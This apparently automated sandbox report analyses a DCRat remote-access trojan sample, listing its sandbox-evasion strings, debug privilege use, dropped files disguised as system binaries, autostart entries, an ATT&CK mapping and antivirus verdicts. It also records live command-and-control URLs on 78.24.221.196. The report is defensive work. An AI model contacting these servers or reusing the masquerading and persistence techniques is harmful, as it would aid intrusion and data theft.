            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596825Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596659Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599875
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599766
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599641
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599529
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599422
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599313
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599188
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599063
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598953
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598844
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598719
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598609
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598494
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598391
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598161
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597972
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597790
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597687
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597578
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597469
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597359
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597250
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597141
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597021
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596907
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596782
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599875
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599765
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599656
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599547
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599437
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599328
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598937
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598750
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598625
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598514
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598406
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598297
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598187
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598066
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597937
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597828
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597718
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597609
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597500
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597390
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597281
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597171
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597062
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596953
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596844
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599890
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599781
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599670
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599562
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599452
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599319
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599182
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599074
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598937
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598750
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598609
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598468
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598359
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598250
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598140
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598031
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597921
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597812
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597703
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597593
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597484
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597375
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597265
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597154
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597046
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596911
            Source: 7fGdoA6Inq.exe, QtLimbtNymPOHuXh.exe.0.dr, RuntimeBroker.exe.0.dr, wininit.exe.0.drBinary or memory string: SxI9u11lANfyqemU363p
            Source: 7fGdoA6Inq.exe, QtLimbtNymPOHuXh.exe.0.dr, RuntimeBroker.exe.0.dr, wininit.exe.0.drBinary or memory string: ooJQ75DXlOMQemUDX60b
            Source: QtLimbtNymPOHuXh.exe, 00000012.00000002.2660711410.000000001BBE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
            Source: QtLimbtNymPOHuXh.exe, 0000000C.00000002.1911389638.000000001B782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIr;
            Source: 7fGdoA6Inq.exe, 00000000.00000002.1736345086.000000001B352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_@~5
            Source: 7fGdoA6Inq.exe, 00000000.00000002.1736543863.000000001B8B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: w32tm.exe, 00000006.00000002.1785915887.000002982D7C9000.00000004.00000020.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1826354106.000000001B777000.00000004.00000020.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2163262854.000000001BB82000.00000004.00000020.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2413626496.000000001AFF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
            Source: C:\PerfLogs\wininit.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\7fGdoA6Inq.exe "C:\Users\user\Desktop\7fGdoA6Inq.exe" Jump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeQueries volume information: C:\Users\user\Desktop\7fGdoA6Inq.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeQueries volume information: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeQueries volume information: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe VolumeInformationJump to behavior
            Source: C:\PerfLogs\wininit.exeQueries volume information: C:\PerfLogs\wininit.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeQueries volume information: C:\Users\user\Desktop\7fGdoA6Inq.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeQueries volume information: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeQueries volume information: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe VolumeInformation
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeQueries volume information: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe VolumeInformation
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeQueries volume information: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe VolumeInformation
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 7fGdoA6Inq.exe PID: 7404, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 7668, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 8028, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 4548, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 7584, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 1900, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 7fGdoA6Inq.exe PID: 7404, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 7668, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 8028, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 4548, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 7584, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QtLimbtNymPOHuXh.exe PID: 1900, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		323
            Masquerading            		OS Credential Dumping11
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		12
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt31
            Registry Run Keys / Startup Folder            		31
            Registry Run Keys / Startup Folder            		31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials14
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1573327 Sample: 7fGdoA6Inq.exe Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 13 other signatures 2->48 7 7fGdoA6Inq.exe 10 16 2->7         started        11 wininit.exe 3 2->11         started        13 RuntimeBroker.exe 3 2->13         started        15 5 other processes 2->15 process3 dnsIp4 32 C:\Windows\System32\...\RuntimeBroker.exe, PE32 7->32 dropped 34 C:\Program Files\...\QtLimbtNymPOHuXh.exe, PE32 7->34 dropped 36 C:\PerfLogs\wininit.exe, PE32 7->36 dropped 38 5 other malicious files 7->38 dropped 50 Creates an undocumented autostart registry key 7->50 52 Creates multiple autostart registry keys 7->52 54 Creates an autostart registry key pointing to binary in C:\Windows 7->54 62 4 other signatures 7->62 18 cmd.exe 1 7->18         started        20 schtasks.exe 7->20         started        22 schtasks.exe 7->22         started        24 schtasks.exe 7->24         started        56 Antivirus detection for dropped file 11->56 58 Multi AV Scanner detection for dropped file 11->58 60 Machine Learning detection for dropped file 11->60 40 78.24.221.196, 443, 49730, 49731 THEFIRST-ASRU Russian Federation 15->40 file5 signatures6 process7 process8 26 7fGdoA6Inq.exe 2 18->26         started        28 w32tm.exe 1 18->28         started        30 conhost.exe 18->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            7fGdoA6Inq.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
            7fGdoA6Inq.exe100%AviraTR/Dropper.Gen
            7fGdoA6Inq.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe100%AviraTR/Dropper.Gen
            C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat100%AviraBAT/Delbat.C
            C:\PerfLogs\wininit.exe100%AviraTR/Dropper.Gen
            C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe100%Joe Sandbox ML
            C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe100%Joe Sandbox ML
            C:\PerfLogs\wininit.exe100%Joe Sandbox ML
            C:\PerfLogs\wininit.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
            C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
            C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh100%Avira URL Cloudmalware
            https://78.24.221.1960%Avira URL Cloudsafe
            http://78.24.221.196/destenyserver/0%Avira URL Cloudsafe
            https://78.24.221.196(0%Avira URL Cloudsafe
            http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1100%Avira URL Cloudmalware
            http://78.24.2Hj0%Avira URL Cloudsafe
            http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmm100%Avira URL Cloudmalware
            https://78.24.221.196:443/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383100%Avira URL Cloudmalware
            https://78.24.HJc0%Avira URL Cloudsafe
            http://78.24.221.1960%Avira URL Cloudsafe
            http://78.24.2H0%Avira URL Cloudsafe
            http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2100%Avira URL Cloudmalware
            https://78.24.221.196N0%Avira URL Cloudsafe
            https://78.24.221.196:443/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqH100%Avira URL Cloudmalware
            https://78.24.221.196GG0%Avira URL Cloudsafe
            http://go.mic$0%Avira URL Cloudsafe
            http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&i100%Avira URL Cloudmalware
            https://78.24.221.196:443/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&100%Avira URL Cloudmalware
            https://78.24.221.196:443/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTC100%Avira URL Cloudmalware
            http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I100%Avira URL Cloudmalware
            http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWp100%Avira URL Cloudmalware
            http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD100%Avira URL Cloudmalware
            https://78.24.H0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fp2e7a.wpc.phicdn.net
            		192.229.221.95
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwhtrue
              • Avira URL Cloud: malware
              		unknown
              http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1true
              • Avira URL Cloud: malware
              		unknown
              http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0Itrue
              • Avira URL Cloud: malware
              		unknown
              http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MDtrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://78.24.221.196(QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000033EC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://78.24.221.196:443/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003247000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003434000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003552000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003298000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
